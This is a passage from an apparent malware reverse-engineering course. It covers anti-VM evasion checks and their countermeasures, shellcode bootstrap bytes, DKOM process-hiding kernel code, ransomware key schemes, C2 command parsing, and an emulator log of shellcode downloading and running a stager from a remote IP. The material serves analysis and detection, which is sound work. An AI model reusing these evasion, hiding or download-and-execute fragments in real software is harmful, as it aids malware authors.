08:00:27 = VirtualBox
00:15:5D = Hyper-V
00:50:56 = VMware ESXi
Defeat: change the VM NIC MAC address to a real vendor OUI (e.g. Intel: 00:1B:21)

Disk size check (VMs often have small disks):
if (disk_size < 100GB) exit();   // real machines rarely have <100GB drives
Defeat: provision the analysis VM with a 120GB+ virtual disk

Screen resolution check:
if (GetSystemMetrics(SM_CXSCREEN) < 1024) exit();
Defeat: set the VM resolution to 1920×1080 before taking the clean baseline snapshot
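The OUI check above is easy to run against your own analysis VM before taking the baseline snapshot. A minimal sketch, using only the four prefixes listed above; the `vm_vendor_for_mac` helper is hypothetical and the table is not an exhaustive list of virtualisation vendors.

```python
# OUI prefixes taken from the list above.
VM_OUIS = {
    "00:0C:29": "VMware",
    "00:50:56": "VMware",
    "08:00:27": "VirtualBox",
    "00:15:5D": "Hyper-V",
}

def vm_vendor_for_mac(mac):
    """Return the virtualisation vendor for a MAC address, or None if the OUI is not listed."""
    oui = mac.replace("-", ":").upper()[:8]   # first three octets
    return VM_OUIS.get(oui)

print(vm_vendor_for_mac("00-0c-29-aa-bb-cc"))
print(vm_vendor_for_mac("00:1B:21:12:34:56"))
```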

User Interaction and Environment Checks

User and Environment Checks · Mouse movement, recent files, username, and locale-based evasion

Mouse movement check (no user interaction in sandbox):
POINT pt1, pt2;
GetCursorPos(&pt1);
Sleep(5000);   // wait 5 seconds
GetCursorPos(&pt2);
if (pt1.x == pt2.x && pt1.y == pt2.y) exit();   // no movement = sandbox
Defeat: x64dbg → modify pt2.x/pt2.y to differ from pt1; or use a mouse-movement script

Recent files / MRU check (real users have recently opened documents):
if (count(HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs) < 10) exit();
Defeat: populate the analysis VM with fake recent document history before the baseline snapshot

Username/hostname blocklist:
Blocklisted usernames: SANDBOX, MALTEST, ANALYST, JOHN, virus, malware
Blocklisted hostnames: DESKTOP-FLAREVM, SANDBOX-WIN10, CUCKOO
Defeat: use a realistic username/hostname that appears on none of these lists (e.g. FINANCE-LT07 / m.alvarez)

CIS locale exclusion (crimeware avoiding Eastern Europe):
if (GetSystemDefaultLCID() in {RU=0x419, UA=0x422, BY=0x423, KZ=0x43F}) exit();
Defeat: set the VM locale to en-US (0x0409) if not already set
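The username, hostname, and locale checks above can be turned into a quick audit of a planned VM baseline. This is a minimal sketch that reuses only the blocklist entries and LCIDs given above; real samples carry their own lists, and `audit_baseline` is a hypothetical helper.

```python
CIS_LCIDS = {0x419: "ru-RU", 0x422: "uk-UA", 0x423: "be-BY", 0x43F: "kk-KZ"}
BLOCKLISTED_USERS = {"sandbox", "maltest", "analyst", "john", "virus", "malware"}
BLOCKLISTED_HOSTS = {"desktop-flarevm", "sandbox-win10", "cuckoo"}

def audit_baseline(username, hostname, lcid):
    """Return human-readable findings for values a sample might gate on."""
    findings = []
    if username.lower() in BLOCKLISTED_USERS:
        findings.append("username %r is on a common blocklist" % username)
    if hostname.lower() in BLOCKLISTED_HOSTS:
        findings.append("hostname %r is on a common blocklist" % hostname)
    if lcid in CIS_LCIDS:
        findings.append("locale %s (0x%X) triggers CIS exclusion" % (CIS_LCIDS[lcid], lcid))
    return findings

for finding in audit_baseline("JOHN", "CUCKOO", 0x419):
    print("[!] " + finding)
print(audit_baseline("m.alvarez", "FINANCE-LT07", 0x409))
```

An empty list only means the baseline passes these particular checks, not that it is undetectable.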

Reversing the Anti-VM Code Itself

When a sophisticated sample evades your environment despite these countermeasures, the solution is to reverse engineer the anti-VM routine itself and understand exactly what it checks. Set breakpoints before the check, single-step through it, observe what API it calls or what registry key it reads, and patch the comparison. The analytical approach always wins — every check is a comparison that can be patched.

Key Takeaways — Chapter 8

Configuring the analysis VM baseline correctly eliminates most anti-VM checks before they become a per-sample problem — realistic hostname, username, MAC address, disk size, screen resolution, and populated document history should all be set before taking the clean baseline snapshot
CPUID leaf 0x40000000 returns the hypervisor vendor string — VMware and VirtualBox both have characteristic strings that malware compares against; this string can be overridden in VMware .vmx configuration files
The CPUID hypervisor present bit (ECX bit 31 from leaf 1) is the fastest VM detection check and the hardest to defeat without hardware virtualisation configuration changes — some analysts use bare-metal machines for samples that heavily gate on this
Locale-based exclusions (CIS country codes) are common in crimeware — an analysis VM with en-US locale is transparent to this check without any modification
Every anti-VM check reduces to a comparison that can be patched in x64dbg — if the environment-level countermeasures don't work, reverse the check and patch the branch; analysis always proceeds

Part IV · Chapters 9–12

Advanced Topics

Shellcode analysis, kernel malware and rootkits, full ransomware reverse engineering, and C2 protocol reconstruction — the specialist skills that complete the reverse engineering toolkit

Chapter 09 · ~15 min · Advanced Topics Specialist RE

Shellcode Analysis

Position-independent code, the GetPC technique, PEB walk to find kernel32, running shellcode safely with scdbg and Speakeasy, and analysing shellcode in Ghidra

Shellcode is position-independent executable code — a raw byte sequence that can run at any memory address without the Windows loader's assistance. It contains no import table, no PE header, no relocation table. It finds everything it needs at runtime: its own location in memory, the base address of kernel32, the addresses of the API functions it requires. Understanding how it does this is what makes shellcode analysis tractable.

Why Shellcode Has No Imports

A PE file delegates import resolution to the Windows loader. Shellcode has no loader, so it must bootstrap itself. The techniques covered in this chapter, GetPC and the PEB walk, are the standard Windows shellcode bootstrap mechanism. Nearly all shellcode you encounter uses some variant of them, which makes them the first patterns to look for in any shellcode analysis.

The GetPC Technique

Position-independent code cannot use hardcoded addresses, because it doesn't know where it will be loaded in memory. To reference its own data (embedded strings, encrypted payloads, function tables), shellcode first needs to determine its own current address. The classic technique is the CALL/POP pattern.

GetPC: CALL/POP Pattern · How shellcode discovers its own address in memory

Classic x86 GetPC (CALL pushes the next instruction's address onto the stack):
00000000  E8 00 00 00 00   call $+5       ; push address of next instruction (0x00000005)
00000005  58               pop  eax       ; eax = 0x00000005 (shellcode base + 5)
00000006  83 E8 05         sub  eax, 5    ; subtract 5 → eax = shellcode base address

x64 variant using RIP-relative addressing (simpler, no CALL/POP needed):
0000000000000000  48 8D 05 F9 FF FF FF   lea rax, [rip-7]   ; rax = address of this instruction

After GetPC, shellcode accesses its embedded data by offset from the base:
00000009  8D 48 50         lea ecx, [eax+50h]   ; ecx = shellcode_base + 0x50
                                                 ; offset 0x50 = beginning of the embedded C2 URL string
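The classic x86 pattern above has a fixed byte signature, so a raw blob can be scanned for it before any disassembly. A minimal sketch: it looks for `E8 00 00 00 00` followed immediately by a `POP r32` opcode (0x58 to 0x5F). It deliberately ignores other GetPC variants such as FNSTENV-based ones, and `find_getpc` is a hypothetical helper.

```python
CALL_NEXT = b"\xE8\x00\x00\x00\x00"   # call $+5

def find_getpc(blob):
    """Return offsets of CALL $+5 immediately followed by POP r32 (opcodes 0x58-0x5F)."""
    hits = []
    pos = blob.find(CALL_NEXT)
    while pos != -1:
        nxt = pos + len(CALL_NEXT)
        if nxt < len(blob) and 0x58 <= blob[nxt] <= 0x5F:
            hits.append(pos)
        pos = blob.find(CALL_NEXT, pos + 1)
    return hits

sample = bytes.fromhex("E800000000" "58" "83E805")   # call $+5 ; pop eax ; sub eax, 5
print(find_getpc(sample))
```

A hit inside a larger file (a document, a memory dump) is a useful hint for where to carve the shellcode from.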

The PEB Walk — Finding kernel32 from Scratch

PEB Walk · How shellcode finds the kernel32 base address without calling GetModuleHandle

Windows maintains a linked list of loaded modules in the PEB.
The 3rd entry in InMemoryOrderModuleList is normally kernel32.dll:
0000000A  64 A1 30 00 00 00   mov   eax, fs:[30h]     ; EAX = PEB
00000010  8B 40 0C            mov   eax, [eax+0Ch]    ; EAX = PEB_LDR_DATA
00000013  8B 70 14            mov   esi, [eax+14h]    ; ESI = InMemoryOrderModuleList.Flink (1st entry)
00000016  AD                  lodsd                   ; EAX = [ESI] = 2nd entry (ntdll)
00000017  96                  xchg  eax, esi          ; ESI = 2nd entry, so the next LODSD follows its Flink
00000018  AD                  lodsd                   ; EAX = 3rd entry (kernel32)
00000019  8B 40 10            mov   eax, [eax+10h]    ; EAX = kernel32.dll DllBase

Now EAX = kernel32 base. Shellcode walks its export table to resolve APIs by name or hash.
This is usually followed by the API hashing routine from Chapter 6.

The typical bootstrap sequence in Windows shellcode:
1. GetPC → discover own base address
2. PEB walk → find kernel32 base
3. API hash resolution → resolve needed APIs from kernel32 / ntdll
4. Begin actual malicious activity (download, inject, execute)

Shellcode in Raw Bytes — What It Looks Like on Disk

Shellcode arrives as a raw blob — no headers, no section table, just executable bytes starting at offset zero. Recognising the CALL/POP GetPC pattern and the PEB walk from the raw hex is the first step before loading it into Ghidra or scdbg.

Raw Shellcode — CALL/POP GetPC + PEB Walk in Hex

Offset    00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F   Pattern
0x000000  E8 00 00 00 00 58 83 E8 05 89 45 F8 90 90 90 90   ← CALL $+5 / POP EAX = GetPC
0x000010  64 A1 30 00 00 00 8B 40 0C 8B 70 14 AD 96 AD 8B   ← PEB walk begins: fs:[30h]
0x000020  40 10 89 45 EC 8B 75 EC 8B 76 3C 03 F6 8B 76 78   ← kernel32 DllBase → export dir
0x000030  03 F6 8B 5E 20 03 DE 33 C9 41 8B 3C 8B 03 FE 68     walking export name table
0x000040  E7 CA E2 72 39 07 75 08 8B 56 24 03 D6 0F B7 14   ← hash constant 0x72E2CAE7, stored little-endian as E7 CA E2 72

No MZ header. No section table. Bytes at offset 0 are the first instruction.
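Spotting the PEB access in a hex dump can also be automated. The sketch below searches for three common encodings of "load the PEB pointer": `mov eax, fs:[30h]`, `mov r32, fs:[30h]` with a 32-bit displacement, and the x64 `mov rax, gs:[60h]`. It assumes these direct encodings; shellcode that computes the offset indirectly (for example via `xor ecx, ecx` and `fs:[ecx+30h]`) will not match, and `find_peb_access` is a hypothetical helper.

```python
import re

# Byte signatures for instructions that read the PEB pointer.
PEB_PATTERNS = {
    "x86 mov eax, fs:[30h]": re.compile(rb"\x64\xA1\x30\x00\x00\x00"),
    "x86 mov r32, fs:[30h]": re.compile(rb"\x64\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]\x30\x00\x00\x00"),
    "x64 mov rax, gs:[60h]": re.compile(rb"\x65\x48\x8B\x04\x25\x60\x00\x00\x00"),
}

def find_peb_access(blob):
    """Return sorted (offset, label) pairs for every PEB-pointer load found in `blob`."""
    hits = []
    for label, pattern in PEB_PATTERNS.items():
        hits.extend((m.start(), label) for m in pattern.finditer(blob))
    return sorted(hits)

dump = bytes.fromhex(
    "E8 00 00 00 00 58 83 E8 05 89 45 F8 90 90 90 90"
    "64 A1 30 00 00 00 8B 40 0C 8B 70 14"
)
for offset, label in find_peb_access(dump):
    print("0x%06X  %s" % (offset, label))
```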

Running Shellcode Safely for Analysis

scdbg / Speakeasy · Safely executing shellcode for behavioural analysis without a running Windows instance

scdbg, a shellcode emulator (Linux/Windows, no VM required):
$ scdbg /f shellcode.bin /verbose
Loaded 512 bytes from shellcode.bin
Initializing Emulation...
Starting Emulation...
4011b0 LoadLibraryA(wininet)
4011c3 InternetOpenA(Mozilla/5.0 ...)
4011d2 InternetConnectA(185.220.101.45, 443, ...)
4011e5 HttpOpenRequestA(GET, /stager/payload.bin, ...)
4011f8 HttpSendRequestA(...)
401210 VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
401230 InternetReadFile → writes 0x6200 bytes to allocated buffer
401250 CreateThread(0, 0, allocated_buffer, ...) ← executes downloaded payload
Completed.
IOCs extracted: C2 = 185.220.101.45:443, URI = /stager/payload.bin

Speakeasy (Python, by Mandiant), more accurate emulation:
$ python3 run_speakeasy.py -t shellcode.bin -r -a x86 -o speakeasy_report.json
Output: speakeasy_report.json (full API call log with arguments)

Analysing Shellcode in Ghidra

Ghidra: Shellcode Project · Creating a raw binary project and defining the entry point manually

Shellcode has no PE header, so Ghidra can't auto-detect the format. Import as raw binary:
File → Import File → shellcode.bin
Format: Raw Binary
Language: x86:LE:32:default (or x86:LE:64:default for 64-bit shellcode)
Image Base: 0x00000000

After import, Ghidra shows raw bytes with no functions defined. Manually define the entry point:
Navigate to offset 0x00000000
Press D (Disassemble) → Ghidra disassembles from this point
Press F (Define Function) → creates function FUN_00000000
Rename → shellcode_entry

Follow the PEB walk (Chapter 6 pattern) to the API resolution loop
Use the API hash resolver script to annotate resolved function names
After annotating API calls: decompiler produces readable C-like pseudocode

Key Takeaways — Chapter 9

The CALL/POP GetPC pattern is the first thing to look for in any shellcode — it appears in the first dozen bytes and establishes the base address that all subsequent data references are relative to
The PEB walk is universal in x86 shellcode — fs:[0x30] → PEB → LDR → InMemoryOrderModuleList → third entry = kernel32; recognise this 6-instruction sequence on sight
scdbg provides fast behavioural analysis of shellcode without executing it on real hardware — it emulates API calls and reports all network connections, file operations, and execution transfers in seconds
Ghidra can analyse shellcode as a raw binary — the key difference from PE analysis is manually defining the entry point at offset 0 and manually annotating API calls resolved via the PEB walk
After identifying the PEB walk and API hashing scheme, apply the Chapter 6 hash resolver script to annotate all API call sites — the shellcode becomes fully readable in Ghidra's decompiler

Chapter 10 · ~16 min · Advanced Topics Kernel RE

Rootkit and Kernel Malware Analysis

User-mode vs kernel-mode rootkits, DKOM process and file hiding, driver loading and DriverEntry, WinDbg kernel debugging setup, and Volatility kernel analysis plugins

Rootkits operate at or below the level of the operating system's own visibility mechanisms. A user-mode rootkit can hide from the OS by hooking the functions the OS uses to list processes and files. A kernel-mode rootkit modifies the kernel data structures themselves. Understanding both requires a mental model of how Windows manages processes and handles system calls.

User-Mode vs Kernel-Mode Rootkits

Type	Mechanism	Persistence	Detection Approach
User-mode hook	Modifies function pointers in user-space DLLs (ntdll.dll, kernel32.dll) to intercept API calls	Until process restart; injects into system processes for longevity	Compare in-memory function bytes to on-disk DLL bytes — hooks show as modified bytes
DKOM	Directly modifies kernel objects (process list, file records): removes entries rather than hiding them from queries	Until reboot; survives even kernel queries if the object is removed from all lists	Cross-view analysis: compare results from multiple enumeration methods; Volatility pslist vs psscan discrepancy
Kernel driver	Loads a malicious .sys driver that runs in Ring 0 with full kernel privileges	Via a driver service key under HKLM\SYSTEM\CurrentControlSet\Services pointing to the .sys file	Enumerate loaded drivers; check driver signing; Volatility modules + driverscan
SSDT hook	Overwrites entries in the System Service Descriptor Table to redirect syscalls to malicious handlers	In memory; requires kernel driver to write SSDT	Volatility ssdt plugin — compares SSDT entries to expected ntoskrnl values

DKOM — Direct Kernel Object Manipulation

DKOM: EPROCESS List Unlinking · How a rootkit removes a process from the kernel's active process list

Windows maintains a doubly-linked list of all EPROCESS structures.
The ActiveProcessLinks field links all processes; it sits at EPROCESS+0x448 on Windows 10 x64 version 2004 and later, and the offset differs on other builds.
Removing a process from this list makes it invisible to Process Explorer and Task Manager:

// Kernel driver code to unlink a process from the EPROCESS list
PEPROCESS target = find_process_by_pid(target_pid);
LIST_ENTRY* entry = (LIST_ENTRY*)((ULONG_PTR)target + ACTIVEPROCESSLINKS_OFFSET);

// Standard doubly-linked list removal:
entry->Blink->Flink = entry->Flink;   // previous node's Flink skips this entry
entry->Flink->Blink = entry->Blink;   // next node's Blink skips this entry

// Process is now invisible to any API that walks ActiveProcessLinks
// But it still runs! The scheduler uses a different list.

Detection: Volatility uses multiple enumeration strategies:
pslist → walks ActiveProcessLinks (misses DKOM-hidden processes)
psscan → scans raw memory for EPROCESS pool tags (finds DKOM-hidden processes)
Discrepancy between pslist and psscan = DKOM rootkit hiding a process
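The unlinking and the cross-view detection can be modelled in a few lines of Python. This is a toy simulation, not kernel code: `Proc` stands in for EPROCESS, the list of objects stands in for what a pool-tag scan would find in raw memory, and all PIDs and process names are invented for illustration.

```python
class Proc:
    """Toy stand-in for EPROCESS with its ActiveProcessLinks pointers."""
    def __init__(self, pid, name):
        self.pid, self.name = pid, name
        self.flink = self.blink = self

def link_all(procs):
    """Build a circular doubly-linked list, like ActiveProcessLinks."""
    n = len(procs)
    for i, p in enumerate(procs):
        p.flink = procs[(i + 1) % n]
        p.blink = procs[(i - 1) % n]

def unlink(entry):
    """DKOM-style removal: neighbours skip the entry, the object itself survives."""
    entry.blink.flink = entry.flink
    entry.flink.blink = entry.blink

def walk_list(head):
    """pslist-style view: follow flink pointers starting from `head`."""
    pids, cur = [], head
    while True:
        pids.append(cur.pid)
        cur = cur.flink
        if cur is head:
            return pids

def hidden_pids(list_view, scan_view):
    """Cross-view diff: PIDs found by scanning but missing from the linked list."""
    return sorted(set(scan_view) - set(list_view))

pool = [Proc(4, "System"), Proc(612, "lsass.exe"), Proc(3344, "implant.exe"), Proc(5120, "explorer.exe")]
link_all(pool)
unlink(pool[2])                       # hide implant.exe
list_view = walk_list(pool[0])        # what a list walk sees
scan_view = [p.pid for p in pool]     # what a memory scan sees
print(hidden_pids(list_view, scan_view))
```

The same set difference applies to real tool output: feed it the PID columns from a list-walking plugin and a scanning plugin.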

Kernel Driver Analysis in Ghidra

Ghidra: Kernel Driver (.sys) Analysis · DriverEntry, IRP dispatch table, and SSDT hook detection

Import the .sys file into Ghidra; it's a PE, so analysis proceeds normally
Entry point is DriverEntry (exported symbol or at PE entry point)

DriverEntry signature:
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)

Key things to look for in DriverEntry:
DriverObject->MajorFunction[IRP_MJ_CREATE] = handler_fn;          // file open handler
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ioctl_fn;    // control interface
KeServiceDescriptorTable modification → SSDT hook
PsSetLoadImageNotifyRoutine / PsSetCreateProcessNotifyRoutine → process monitoring
Direct EPROCESS / ETHREAD manipulation → DKOM

Volatility kernel analysis plugins:
$ vol -f memory.raw windows.modules
  lists all loaded kernel modules; look for unsigned or suspicious .sys files
$ vol -f memory.raw windows.driverscan
  scans memory for DRIVER_OBJECT pool tags; finds hidden drivers not in the modules list
$ vol -f memory.raw windows.ssdt
  shows SSDT entries; hooked entries point outside the ntoskrnl.exe address range
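The SSDT check described above reduces to a range test. A minimal sketch, assuming you already have the table entries and the kernel image's base and size (for instance from the module list); every address below is hypothetical, and `hooked_entries` is an illustrative helper rather than part of Volatility.

```python
def hooked_entries(ssdt, kernel_base, kernel_size):
    """Return {index: address} for SSDT entries that fall outside the kernel image."""
    kernel_end = kernel_base + kernel_size
    return {i: a for i, a in ssdt.items() if not (kernel_base <= a < kernel_end)}

# Hypothetical values for illustration only.
KERNEL_BASE, KERNEL_SIZE = 0xFFFFF80002A00000, 0x5E0000
ssdt = {
    0x23: 0xFFFFF80002B41200,   # inside the kernel image
    0x4F: 0xFFFFF88003D10450,   # outside: candidate hook
}
for index, addr in hooked_entries(ssdt, KERNEL_BASE, KERNEL_SIZE).items():
    print("entry 0x%X -> 0x%X (outside kernel image)" % (index, addr))
```

An out-of-range entry is a lead, not proof: resolve the owning module before concluding it is malicious.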

Key Takeaways — Chapter 10

DKOM hides processes by unlinking their EPROCESS entry from ActiveProcessLinks; they are invisible to pslist but still visible to psscan (pool tag scanning), which is why you should always run both
DriverEntry is the kernel driver entry point — the IRP dispatch table assignments it makes reveal the driver's capability: a driver that sets up an IOCTL handler communicates with user-land; one that modifies SSDT entries hooks system calls
SSDT hooks redirect syscalls to the rootkit's handlers — Volatility's ssdt plugin identifies hooks by finding SSDT entries pointing outside ntoskrnl.exe's address range
On 64-bit Windows, a kernel driver needs a valid code-signing signature (driver signature enforcement dates from 64-bit Windows Vista) or a technique to bypass that enforcement; unsigned drivers are an immediate red flag in memory forensics
Cross-view analysis — comparing results from two enumeration methods — is the foundational detection technique for rootkits; any discrepancy between two enumerations of the same resource indicates hiding behaviour

Chapter 11 · ~16 min · Advanced Topics Full RE Case Study

Ransomware Reverse Engineering

Key generation and the asymmetric wrapping scheme, reversing the encryption loop to identify the algorithm, file enumeration logic, weak RNG exploitation for key recovery, and what makes ransomware decryptable

Book 1 showed what ransomware looks like from the outside — the ProcMon events, the shadow copy deletion, the ransom note write. This chapter reverses a ransomware sample from the inside — reading the key generation code, identifying the encryption algorithm from its implementation, and understanding what separates recoverable ransomware (weak RNG, escrow key visible in memory, protocol vulnerability) from truly unrecoverable encryption.

The Standard Ransomware Cryptographic Architecture

Professional ransomware uses a hybrid encryption scheme: fast symmetric encryption (AES) for file content, and asymmetric encryption (RSA or elliptic curve) to protect the symmetric keys. Recovering files requires the attacker's private key, which never touches the victim's machine.

Ransomware Key Architecture · The hybrid encryption scheme in Ghidra decompiler pseudocode

Ghidra decompiler, key generation and per-file encryption:

void encrypt_all_files() {
    // Step 1: generate a random session key
    byte session_aes_key[32];
    CryptGenRandom(hProv, 32, session_aes_key);   // 256-bit AES key

    // Step 2: encrypt a copy of the session key with the attacker's embedded RSA public key
    byte encrypted_session_key[256];
    DWORD key_len = 32;
    memcpy(encrypted_session_key, session_aes_key, 32);   // CryptEncrypt works in place
    CryptEncrypt(hRsaKey, 0, TRUE, 0, encrypted_session_key, &key_len, 256);   // RSA-encrypted with ATTACKER pubkey

    // Step 3: send encrypted session key to C2 (attacker can recover it with privkey)
    send_to_c2(victim_id, encrypted_session_key, 256);

    // Step 4: enumerate and encrypt every file
    enumerate_and_encrypt("C:\\Users\\", session_aes_key);

    // Step 5: zero the plaintext session key from memory
    SecureZeroMemory(session_aes_key, 32);
}
// ↑ If send_to_c2 fails (no internet), encrypted_session_key is written to the ransom note
// ↑ Victim MUST contact attacker: attacker decrypts session key, sends AES key back

Identifying the Encryption Algorithm from Code

When a sample uses the Windows CryptoAPI, the algorithm is identified by the ALG_ID constant passed to CryptGenKey, CryptDeriveKey, or CryptCreateHash, or stored in the header of the key blob passed to CryptImportKey. When it implements encryption from scratch, you identify the algorithm by its mathematical constants.

AES S-Box Detection · Identifying AES from its S-Box constant table in Ghidra

The AES S-Box is a fixed 256-byte lookup table. If this table appears in the binary, the sample implements AES.

Searching in Ghidra for the first bytes of the AES S-Box:
Search → Memory (Hex format) → 63 7C 77 7B F2 6B 6F C5 (first 8 bytes of the AES S-Box)
Found at 0x00407A00: this is the AES S-Box constant table
Cross-reference this address → reaches the AES key schedule and encryption functions
Rename: FUN_00401800 → aes_encrypt_block

Algorithm identification by constants (common in custom implementations):
AES:       S-Box starts 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5
ChaCha20:  constant "expand 32-byte k" (first dword 0x61707865 when read little-endian)
Salsa20:   same constant as ChaCha20
RC4:       256-byte KSA table initialised 0,1,2,...,255 then shuffled with key

CryptoAPI ALG_ID constants (CALG_* values):
0x00006610 = CALG_AES_256
0x0000660E = CALG_AES_128
0x0000A400 = CALG_RSA_KEYX
0x0000800C = CALG_SHA_256
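The constant search above can also be run outside Ghidra, for example across a directory of unpacked samples. A minimal sketch that checks for two of the signatures listed above; `find_crypto_constants` is a hypothetical helper, and implementations that build these constants at runtime or embed them as instruction immediates will not match a contiguous byte search.

```python
SIGNATURES = {
    "AES S-box": bytes.fromhex("637C777BF26B6FC5"),     # first 8 bytes of the S-Box
    "ChaCha20/Salsa20 sigma": b"expand 32-byte k",
}

def find_crypto_constants(blob):
    """Return {algorithm: first offset} for each known constant found in `blob`."""
    hits = {}
    for name, sig in SIGNATURES.items():
        offset = blob.find(sig)
        if offset != -1:
            hits[name] = offset
    return hits

# Synthetic blob: padding, S-Box prefix, padding, ChaCha constant.
blob = b"\x00" * 16 + SIGNATURES["AES S-box"] + b"\x90" * 8 + SIGNATURES["ChaCha20/Salsa20 sigma"]
for name, offset in find_crypto_constants(blob).items():
    print("%-24s at offset 0x%X" % (name, offset))
```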

What Makes Ransomware Decryptable — The Weak RNG Case

Weak RNG: Key Recovery
Ransomware that seeds its RNG from the system time is recoverable

Ghidra decompiler: weak key generation (actual pattern from early ransomware families)

void generate_key_WEAK(byte* key_out) {
    SYSTEMTIME st;
    GetLocalTime(&st);                                // ← seed is the current time
    srand(st.wMilliseconds + st.wSecond * 1000);
    for (int i = 0; i < 32; i++) {
        key_out[i] = (byte)rand();                    // ← uses weak PRNG, not CryptGenRandom
    }
}
// The seed uses only the seconds and milliseconds fields, so it can take just
// 60 × 1,000 = 60,000 distinct values, whatever the date and time of infection.
// Regenerate the key for each candidate seed and try it against an encrypted file
// with known plaintext (for example a fixed file-format header) → key recovery

Strong key generation (using CryptGenRandom: not recoverable without the attacker's private key):

CryptGenRandom(hProv, 32, key_out);                   // 2^256 keyspace, brute force infeasible
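The brute-force described above can be sketched in a few lines. This is an illustration under stated assumptions, not a ready-made decryptor: it assumes the sample was linked against the Microsoft C runtime, whose rand() is the linear congruential generator reproduced below, and it leaves the actual key check to a caller-supplied function (is_correct_key is a hypothetical callback that would normally decrypt a known file header and compare it with the expected plaintext).

```python
def msvc_rand_stream(seed):
    """Yield successive rand() values as produced by the Microsoft CRT after srand(seed)."""
    state = seed & 0xFFFFFFFF
    while True:
        state = (state * 214013 + 2531011) & 0xFFFFFFFF
        yield (state >> 16) & 0x7FFF


def key_from_seed(seed, length=32):
    """Rebuild the key the weak generator would emit: one (byte)rand() per key byte."""
    stream = msvc_rand_stream(seed)
    return bytes(next(stream) & 0xFF for _ in range(length))


def recover_key(is_correct_key, length=32):
    """Try every seed of the form wMilliseconds + wSecond * 1000 (0..59999)."""
    for seed in range(60 * 1000):
        key = key_from_seed(seed, length)
        if is_correct_key(key):
            return seed, key
    return None


# Demo with a stand-in oracle: pretend the victim key came from second 42, millisecond 137.
target = key_from_seed(42 * 1000 + 137)
result = recover_key(lambda candidate: candidate == target)
print(result[0], result[1].hex())
```

Samples built with a different runtime use a different generator, so confirm the rand() implementation in the disassembly before relying on these constants.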

Key Takeaways — Chapter 11

The standard ransomware architecture uses AES for file encryption and RSA to protect the AES key — recovery requires the attacker's RSA private key unless a vulnerability exists in the key generation
Ransomware using rand() or time-based seeds instead of CryptGenRandom is potentially recoverable — the seed space is brute-forceable if the infection timestamp is known
Identifying the encryption algorithm by its mathematical constants (AES S-Box, ChaCha20 "expand 32-byte k") is faster than tracing the full key schedule — search for known constant byte sequences in Ghidra
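If the C2 connection fails during key exchange, many ransomware families write the encrypted session key to the ransom note or a local file. That blob is still RSA-encrypted, so it does not enable recovery on its own, but preserve it (and any captured C2 traffic) before it is deleted: it is the input a decryptor needs if the attacker's private key is ever obtained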
The encryption loop structure (file enumeration → select the session or per-file AES key → encrypt file → rename with extension) is consistent across most ransomware families; it is quick to identify in Ghidra once you recognise the patterns from Chapter 1's loop recognition

Chapter 12 · ~16 min · Advanced Topics Full RE Capstone

C2 Protocol Reverse Engineering and Detection

Finding and reversing the communication function, the command parsing loop, response encoding, emulating the protocol in Python, writing Suricata rules, and the complete RE workflow end-to-end

Every implant communicates with its operator via a C2 protocol. Understanding that protocol at the code level — not just observing its traffic from the outside — is what makes it possible to write detection rules that survive C2 infrastructure rotation, build decoders that can parse encrypted command streams, and understand the full command set the operator has available. This final chapter walks the complete reverse engineering of a C2 communication function.

Finding the C2 Communication Function

Ghidra: Locating the C2 Function
Working backward from network API imports to the communication function

Entry point: the import table shows InternetOpenA and HttpSendRequestA

In Ghidra: Symbol Tree → Imports → WININET.DLL → HttpSendRequestA
Right-click HttpSendRequestA → References → Find References → shows 2 call sites: 0x00401C20, 0x00401D80

Navigate to 0x00401C20: this is likely in the main beacon function
Rename containing function → beacon_send

Navigate to beacon_send's caller:
Right-click beacon_send → References → finds it called from FUN_00401A00
FUN_00401A00 sets up the headers, builds the POST body, calls beacon_send
Rename: FUN_00401A00 → c2_checkin

Navigate to c2_checkin's caller:
Called in a loop with Sleep(60000) → this is the beacon loop
Rename containing function → beacon_loop

Reversing the Command Parsing Loop

Ghidra Decompiler: parse_c2_response(), after annotation

void parse_c2_response(byte* response, DWORD resp_len) {
    // Response format: [4-byte magic][1-byte cmd_id][4-byte data_len][data...]
    if (*((DWORD*)response) != 0xDEADBEEF) {        // magic check
        return;
    }
    byte  cmd_id   = response[4];                    // command byte
    DWORD data_len = *((DWORD*)&response[5]);        // data length (little-endian)
    byte* data     = &response[9];                   // data payload

    switch (cmd_id) {
        case 0x01: cmd_shell_execute(data, data_len); break;   // execute shell command
        case 0x02: cmd_file_upload(data, data_len);   break;   // upload file to C2
        case 0x03: cmd_file_download(data, data_len); break;   // download file from C2
        case 0x04: cmd_screenshot();                  break;   // capture screenshot
        case 0x05: cmd_keylog_start();                break;   // start keylogger
        case 0xFF: cmd_uninstall();                   break;   // self-delete
    }
}
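Once the header layout is known, the same parsing logic can be mirrored in Python to decode packets pulled from a capture. The sketch below follows the format in the decompiled function (4-byte magic, 1-byte command, 4-byte length, all little-endian). The parse_packet name and the added bounds checks are assumptions of this example and are not present in the sample's code.

```python
import struct

MAGIC = 0xDEADBEEF
HEADER = struct.Struct("<IBI")  # magic, cmd_id, data_len: 9 bytes, no padding

# Handler names as assigned during annotation of the dispatch switch.
COMMANDS = {
    0x01: "shell_execute",
    0x02: "file_upload",
    0x03: "file_download",
    0x04: "screenshot",
    0x05: "keylog_start",
    0xFF: "uninstall",
}


def parse_packet(buf):
    """Split a raw C2 packet into (command name, payload bytes)."""
    if len(buf) < HEADER.size:
        raise ValueError("truncated header")
    magic, cmd_id, data_len = HEADER.unpack_from(buf, 0)
    if magic != MAGIC:
        raise ValueError("bad magic")
    data = buf[HEADER.size:HEADER.size + data_len]
    if len(data) != data_len:
        raise ValueError("truncated payload")
    return COMMANDS.get(cmd_id, f"unknown_0x{cmd_id:02X}"), data


# Demo packet: shell command with a 6-byte (here unencrypted) payload.
demo = struct.pack("<IBI", MAGIC, 0x01, 6) + b"whoami"
print(parse_packet(demo))
```

Because the magic is stored little-endian, the first four bytes on the wire are EF BE AD DE, which is the byte order a network signature has to match.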

Extracting the Session Key and Emulating the Protocol

Session Key Extraction
Finding the AES session key used to encrypt C2 traffic

The C2 traffic is AES-encrypted. The key is hardcoded in the binary. In Ghidra, the beacon_send function shows:

